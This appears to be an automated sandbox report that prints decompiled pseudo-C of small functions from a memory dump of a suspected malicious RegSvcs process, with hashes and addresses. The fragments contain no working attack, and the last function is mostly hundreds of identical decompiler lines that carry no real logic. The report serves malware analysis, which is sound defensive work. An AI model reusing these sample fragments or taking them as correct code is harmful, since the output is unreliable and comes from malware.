                                                • Instruction ID: b66c3923b69d75a102d409177a2a7bdbdd0d51b4bd91dfbaaf16b7baba22c4c1
                                                • Opcode Fuzzy Hash: b460ce71229560444c1ca186c51c88d3d7de14b770db45f4d8e95f59e83d5391
                                                • Instruction Fuzzy Hash: E501627290030C66DB14EBA1CC82FEF773D9B44704F00459AB6496B0C1D6B9A698CBE5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041B29C Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E0041B29C(void* __ecx, void* __edx) {
				void* __ebp;
				void* _t19;
				intOrPtr _t23;
				void* _t24;
				void* _t27;
				void* _t32;
				signed int _t40;
				void* _t46;
				void* _t50;
				intOrPtr* _t51;

				_t41 = __edx;
				asm("repne xlatb");
				_t51 =  *((intOrPtr*)(0xffffffffec8b5587));
				 *0xFFFFFFFFEC8B557B = 0;
				_t47 = E0041B400(0, L00409C00(_t19, __edx, _t51, 0x71, _t46, _t50));
				_t23 = L00414A40( *((intOrPtr*)(_t21 + 0x28)), _t41, _t51,  *((intOrPtr*)(_t21 + 0x28)), 2, 0); // executed
				_t34 = _t23;
				if(_t23 != 0) {
					_t24 = E0041B0E0(_t51,  *((intOrPtr*)(_t47 + 0x18)), _t34); // executed
					if(_t24 == 0) {
						goto L2;
					} else {
						 *(_t51 + 0x10) =  *(_t51 + 0x14) ^  *(_t51 + 4);
						_t27 = E0041BE10(_t51 + 0xba4, 0xf0);
						_push(0);
						_push(4);
						L00419EF0(_t27,  *_t51, _t51,  *_t51, 7, 0xffffffffec8b557b); // executed
						_t40 = 0xec8b5500 |  *((intOrPtr*)(0xffffffffec8b557b)) !=  *_t51;
						if(_t40 != 0) {
							_t32 = 0;
							do {
								 *((intOrPtr*)(_t32 + _t51 + 0x44)) =  *((intOrPtr*)(_t32 + _t51 + 0x44)) + 0xff;
								_t32 = _t32 + 1;
							} while (_t32 < 0xd);
						}
						 *((intOrPtr*)(_t51 + 0x2a)) =  *((intOrPtr*)(_t51 + 0x2a)) + _t40;
						E0041BDC0(_t51, _t34); // executed
						return 1;
					}
				} else {
					L2:
					return 0;
				}
			}













                                                0x0041b29c
                                                0x0041b29c
                                                0x0041b2a6
                                                0x0041b2ad
                                                0x0041b2c3
                                                0x0041b2cc
                                                0x0041b2d1
                                                0x0041b2d8
                                                0x0041b2e9
                                                0x0041b2f3
                                                0x00000000
                                                0x0041b2f5
                                                0x0041b307
                                                0x0041b30a
                                                0x0041b311
                                                0x0041b313
                                                0x0041b31d
                                                0x0041b32a
                                                0x0041b32f
                                                0x0041b331
                                                0x0041b335
                                                0x0041b335
                                                0x0041b339
                                                0x0041b33a
                                                0x0041b335
                                                0x0041b33f
                                                0x0041b344
                                                0x0041b357
                                                0x0041b357
                                                0x0041b2da
                                                0x0041b2da
                                                0x0041b2e2
                                                0x0041b2e2

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056834096.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000008.00000002.1056834096.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056834096.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8bdaae67b187bf0ae24bd2c62a882cd2107b04b11d7f629bbdb2ba19b8503b83
                                                • Instruction ID: f6dbf8cf5b7bc9e13f38c083f25098212851695a62f2787b6d5271e66070f768
                                                • Opcode Fuzzy Hash: 8bdaae67b187bf0ae24bd2c62a882cd2107b04b11d7f629bbdb2ba19b8503b83
                                                • Instruction Fuzzy Hash: 54E09271B442043AF61095A69D82FEB228CDB48755F00005AFE08E7282E6A85D8143E9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041BD80 Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 58%
                                                			E0041BD80(intOrPtr* _a4, char _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
				void* __ebp;
				void* _t13;

				_push(_a20);
				_push(_a16);
				_t13 = L0041A570(_a4,  *_a4, _a4,  *_a4,  &_a8,  &_a12); // executed
				if(_t13 >= 0) {
					return 0 | _t13 == 0x00000000;
				} else {
					return 0;
				}
			}





                                                0x0041bd8c
                                                0x0041bd8d
                                                0x0041bda0
                                                0x0041bdaa
                                                0x0041bdba
                                                0x0041bdac
                                                0x0041bdaf
                                                0x0041bdaf

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056834096.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000008.00000002.1056834096.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056834096.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 109c2ca53fcf6fc1b196921efd37a8f4837faefbecd720628da7d59195cd9314
                                                • Instruction ID: 5c3d57b58003552c72f3f28b06278392e0bca3fbd0f603c4d7b896a6c34fa751
                                                • Opcode Fuzzy Hash: 109c2ca53fcf6fc1b196921efd37a8f4837faefbecd720628da7d59195cd9314
                                                • Instruction Fuzzy Hash: A8E0EDB660470E6F9B04CEA9DD42CEB37ACEB48214B04451AFD09C3300F630F9208BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041BD40 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 46%
                                                			E0041BD40(intOrPtr* _a4, signed int _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
				void* __ebp;
				void* _t17;

				_push(_a20);
				_push(_a16);
				_t16 = _a4;
				_push( &_a12);
				_t17 = L0041A530(_a4,  &_a8, _a4,  *_t16,  &_a8, 0); // executed
				_t12 = (0 | _t17 < 0x00000000) - 1; // -1
				return _t12 & _a8;
			}





                                                0x0041bd4c
                                                0x0041bd53
                                                0x0041bd54
                                                0x0041bd5d
                                                0x0041bd68
                                                0x0041bd77
                                                0x0041bd7e

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056834096.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000008.00000002.1056834096.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056834096.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 642389ebd1670b3930a428858313bad1e3c29f05f1f5652fb941949013620857
                                                • Instruction ID: fb3a0a12ba009aee57c83139ea1e55bfad0f8109ea70b5d7d8b789f3179a360d
                                                • Opcode Fuzzy Hash: 642389ebd1670b3930a428858313bad1e3c29f05f1f5652fb941949013620857
                                                • Instruction Fuzzy Hash: 15F09875510209AFDB04CF59D881EDA73A9AB88750F048519BD198B241E774EA108BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041BF90 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041BF90(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t5;
				void* _t9;
				intOrPtr _t10;
				void* _t11;

				_t4 = _a4;
				_t10 = _a8;
				_t5 = L0041A620(_a4, _t9, _a4,  *((intOrPtr*)(_t4 + 8)), 0, _t10); // executed
				_t11 = _t5;
				if(_t11 != 0 && _t10 != 0) {
					E0041BE60(_t11, 0, _t10);
					return _t11;
				}
				return _t5;
			}








                                                0x0041bf93
                                                0x0041bf9b
                                                0x0041bfa3
                                                0x0041bfa8
                                                0x0041bfaf
                                                0x0041bfb9
                                                0x00000000
                                                0x0041bfc1
                                                0x0041bfc6

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056834096.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000008.00000002.1056834096.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056834096.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d247396932f4a8300f40d712311be5ade1b09b44a109a05e15eddb776a0e36ea
                                                • Instruction ID: 5a164a28abdfd647aa3259583acf03c24bea810068c87bade3fee15fee748f3f
                                                • Opcode Fuzzy Hash: d247396932f4a8300f40d712311be5ade1b09b44a109a05e15eddb776a0e36ea
                                                • Instruction Fuzzy Hash: 50E08636A0122437C221559AEC46FD7B76DCFC5F64F09002AFE089B341E678AE8186E9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041B960 Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056834096.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000008.00000002.1056834096.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056834096.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b789b76e186f83da7733ba97d8bb84a5686ce04db1d5945f47c12b175bf292cb
                                                • Instruction ID: aaf434b4a9fa5eef455e2289858e74aeba03f834b185d176b6164db69848f5b6
                                                • Opcode Fuzzy Hash: b789b76e186f83da7733ba97d8bb84a5686ce04db1d5945f47c12b175bf292cb
                                                • Instruction Fuzzy Hash: D7E0657191031856F724EBB09D4AFD5737C9B04308F4407D9B60C66182EA7956554A99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041F0A7 Relevance: .0, Instructions: 14COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 97%
                                                			E0041F0A7(void* __eax, void* __ebx, intOrPtr __edx, void* __esi) {
				void* __ebp;
				signed char _t10;
				intOrPtr _t18;
				void* _t19;
				void* _t23;
				signed int _t24;
				signed int _t25;

				_t23 = __esi;
				_t18 = __edx;
				_t10 = __eax -  *((intOrPtr*)(__ebx - 0x30));
				_pop(_t19);
				asm("std");
				if(_t10 >= 0) {
					while(1) {
						 *((intOrPtr*)(_t18 + 0x65f4f281)) =  *((intOrPtr*)(_t18 + 0x65f4f281)) - _t18;
						asm("retf");
						_t10 = _t10 - 1;
						 *0x5c914dcc =  *0x5c914dcc ^ _t24;
						asm("adc eax, [0x377dd316]");
						 *0x1c312b16 =  *0x1c312b16 - _t23;
						_t18 =  *0xcac832c4;
						 *0x586ba1a1 =  *0x586ba1a1 ^ _t24;
						asm("cmpsb");
						asm("adc edi, [0xd9a5678c]");
						_t19 = (_t19 +  *0x18a17737 | 0xab69ea06) - 1;
						if(_t19 >= 0) {
							break;
						}
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
						 *_t10 =  *_t10 + _t10;
